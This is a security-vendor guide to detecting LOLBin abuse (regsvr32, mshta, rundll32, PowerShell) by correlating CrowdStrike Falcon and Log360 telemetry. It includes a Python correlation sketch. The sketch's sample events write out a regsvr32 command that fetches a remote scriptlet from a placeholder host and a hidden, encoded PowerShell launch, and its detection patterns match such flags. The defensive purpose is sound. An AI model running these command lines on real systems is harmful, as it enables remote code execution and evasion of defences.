How to detect trusted binary weaponization with CrowdStrike and Log360
Understanding the threat
Trusted binary weaponization is a technique where attackers abuse legitimate Windows executables to execute malicious commands, download payloads, bypass security controls, or maintain persistence.
Instead of deploying custom malware, attackers rely on signed system binaries such as regsvr32.exe, rundll32.exe, mshta.exe, powershell.exe, and certutil.exe.
Because these binaries are native to Windows and commonly used for administrative tasks, their activity often appears legitimate and bypasses traditional signature-based detection.
The threat becomes visible when trusted binary execution is correlated with suspicious command-line arguments, abnormal parent-child process relationships, and endpoint detections.
Category
Endpoint Threat
Relevant MITRE ATT&CK® mapping
This use case maps to the following ATT&CK tactics and techniques:
- T1218 – Signed Binary Proxy Execution
- T1059 – Command and Scripting Interpreter
- TA0005 – Defense Evasion
Relevant compliance mapping
- NIST SP 800-53 SI-4 – Information System Monitoring
- NIST SP 800-53 SI-7 – Software Integrity
- CIS Controls v8 – Audit Log Management
Scenario
A Windows enterprise environment observes unusual process execution activity involving trusted Windows binaries.
Within a short timeframe:
- regsvr32.exe executes remote script content
- mshta.exe launches encoded PowerShell commands
- rundll32.exe spawns unexpected child processes
At the same time, CrowdStrike Falcon generates behavioral detections associated with suspicious execution techniques.
Initially, the activity does not appear critical because:
- The binaries are legitimate Windows executables
- No malware file is written to disk
- Individual executions resemble administrative activity
Further investigation reveals that attackers weaponized trusted binaries to execute malicious payloads and evade traditional detection controls.
What went wrong?
- Trusted binaries were treated as low-risk activity
- Suspicious command-line behavior was not prioritized
- Parent-child process anomalies were analyzed separately
- Execution chains were not correlated across telemetry sources
How EDR and SIEM correlation helps
CrowdStrike Falcon identifies suspicious execution behavior involving trusted Windows binaries. However, isolated detections may not fully reveal the execution sequence or attacker intent.
Log360 Cloud correlates:
- Falcon behavioral detections
- Process creation events
- Suspicious command-line execution
- Abnormal parent-child process relationships
When trusted binaries execute suspicious commands or spawn unusual child processes, Log360 identifies a high-confidence trusted binary abuse pattern and escalates the activity for investigation.
Threats at the gate: Real-world trends
- Attackers increasingly rely on living-off-the-land binaries (LOLBins) to evade traditional security controls.
- Fileless attacks commonly abuse trusted binaries for execution and persistence.
- Signed Microsoft executables are frequently weaponized during post-compromise activity.
Use case objective
To detect malicious use of trusted Windows binaries by correlating suspicious execution behavior and endpoint telemetry.
Prerequisites
- CrowdStrike Falcon Event Streams extension: Install and configure the extension in Log360 Cloud.
- Windows process monitoring enabled: Ensure Event ID 4688 or Sysmon Event ID 1 is collected.
- Command-line logging enabled: Capture process execution arguments.
- Sysmon configuration enabled: Configure detailed process creation telemetry.
- Log forwarding configured: Ensure Windows and CrowdStrike logs are ingested into Log360 Cloud.
How to detect trusted binary weaponization in Log360 Cloud
Step 1
Configure CrowdStrike Falcon Event Streams along with Windows Security logs or Sysmon logs as data sources in Log360 Cloud. Verify that process execution telemetry and Falcon detections are being ingested successfully.
Step 2
Ensure process creation events capture process names, command-line execution details, and parent-child process relationships. Verify that logging is enabled for commonly abused binaries such as regsvr32.exe, rundll32.exe, mshta.exe, and powershell.exe.
Step 3
Navigate to Security > Rules and enable the detection rule named Trusted Binary Weaponized.
The rule correlates suspicious execution behavior involving trusted Windows binaries with Falcon behavioral detections.
Detection rule reference
| Field | Value |
|---|---|
| Rule name | Trusted Binary Weaponized |
| Description | Detects malicious use of trusted Windows binaries through suspicious execution behavior |
| Objective | Identify weaponized LOLBin activity and fileless execution techniques |
| Severity | Critical |
| Detection type | Correlation rule |
| Detection mode | Real-time |
Detection logic
The rule triggers when:
- Trusted binaries such as regsvr32.exe, rundll32.exe, mshta.exe, or powershell.exe execute suspicious command-line activity
- Abnormal child process spawning is detected
- CrowdStrike Falcon generates related behavioral detections
- The events occur within a defined timeframe
Grouping fields: ENDPOINT_NAME, USERNAME
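The correlation described above, as an added Python illustration rather than Log360's own rule implementation: it groups constructed Sysmon and Falcon events by endpoint and user, flags trusted binaries with remote or encoded command lines or with interpreter child processes, and alerts only when a Falcon detection lands in the same window. The 10-minute window, the event field names and the detection name are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

TRUSTED_BINARIES = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "powershell.exe"}
CHILD_INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
WINDOW = timedelta(minutes=10)  # the rule's "defined timeframe" (assumed value)

def suspicious_cmdline(image, cmdline):
    """Remote content or an encoded command handed to a trusted binary."""
    c = cmdline.lower()
    return image in TRUSTED_BINARIES and (
        "http://" in c or "https://" in c or " -enc" in c or "-encodedcommand" in c)

def abnormal_child(parent_image, image):
    """A trusted binary spawning a scripting or command interpreter."""
    return parent_image in TRUSTED_BINARIES and image in CHILD_INTERPRETERS

def correlate(events):
    """Group by (ENDPOINT_NAME, USERNAME); alert when a suspicious process event
    and a Falcon detection in the same group fall within WINDOW of each other."""
    groups = defaultdict(list)
    for e in events:
        groups[(e["endpoint"], e["user"])].append(e)
    alerts = []
    for (endpoint, user), evs in groups.items():
        falcon = [e for e in evs if e["source"] == "falcon"]
        for p in evs:
            if p["source"] != "sysmon" or not (suspicious_cmdline(p["image"], p["cmdline"])
                                               or abnormal_child(p["parent_image"], p["image"])):
                continue
            hit = next((f for f in falcon if abs(f["ts"] - p["ts"]) <= WINDOW), None)
            if hit:
                alerts.append({"endpoint": endpoint, "user": user, "process": p["image"],
                               "parent": p["parent_image"], "detection": hit["name"]})
    return alerts

def _ev(mins, source, endpoint, user, **f):  # builds one constructed sample event
    return {"ts": datetime(2024, 1, 1, 9, mins), "source": source,
            "endpoint": endpoint, "user": user, **f}

# Constructed sample telemetry (not real logs): an abuse chain on WS01 with a
# Falcon detection, and routine rundll32 use on WS02 with no detection.
SAMPLE_EVENTS = [
    _ev(0, "sysmon", "WS01", "jdoe", image="regsvr32.exe", parent_image="winword.exe",
        cmdline="regsvr32.exe /s /i:https://example.invalid/x.sct"),
    _ev(1, "sysmon", "WS01", "jdoe", image="powershell.exe", parent_image="mshta.exe",
        cmdline="powershell.exe -w hidden -enc QQBBAEEA"),
    _ev(2, "falcon", "WS01", "jdoe", name="Suspicious process spawned by LOLBin"),
    _ev(5, "sysmon", "WS02", "admin", image="rundll32.exe", parent_image="explorer.exe",
        cmdline="rundll32.exe shell32.dll,Control_RunDLL"),
]
```

Running `correlate(SAMPLE_EVENTS)` yields two alerts for WS01/jdoe and none for the benign WS02 activity, which is the false-positive case the rule's Falcon condition is meant to suppress.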
Step 4
Navigate to Reports > Applications > CrowdStrike Falcon and review behavioral detections, execution trends, and endpoint activity associated with the affected systems.
Step 5
Navigate to Alerts > Manage Alert Profiles and configure a Critical severity alert profile for the Trusted Binary Weaponized rule. Enable real-time notifications for SOC analysts.
Step 6
When the alert is triggered, investigate the activity in the Incident Workbench by reviewing command-line execution details, analyzing parent-child process behavior, and validating associated Falcon detections.
Mitigation and response with CrowdStrike and Log360
With CrowdStrike Falcon
- Isolate affected endpoints
- Terminate suspicious trusted binary executions
- Investigate behavioral detections
- Monitor abnormal LOLBin activity
- Validate indicators against known attacker methodologies
With Log360 Cloud
- Correlate process and endpoint telemetry
- Reconstruct trusted binary attack chains
- Automate containment workflows
- Centralize investigation across endpoints and users
- Detect abnormal execution behavior using UEBA
Combined outcome
CrowdStrike Falcon provides behavioral visibility into suspicious endpoint activity, while Log360 Cloud correlates process execution behavior and trusted binary abuse patterns to identify stealthy attack techniques earlier in the attack lifecycle.
Next steps
- Enable UEBA to identify abnormal execution behavior.
- Restrict unnecessary LOLBin usage across endpoints.
- Enhance command-line execution monitoring.
- Automate response workflows using SOAR.
- Continuously monitor parent-child process anomalies across endpoints.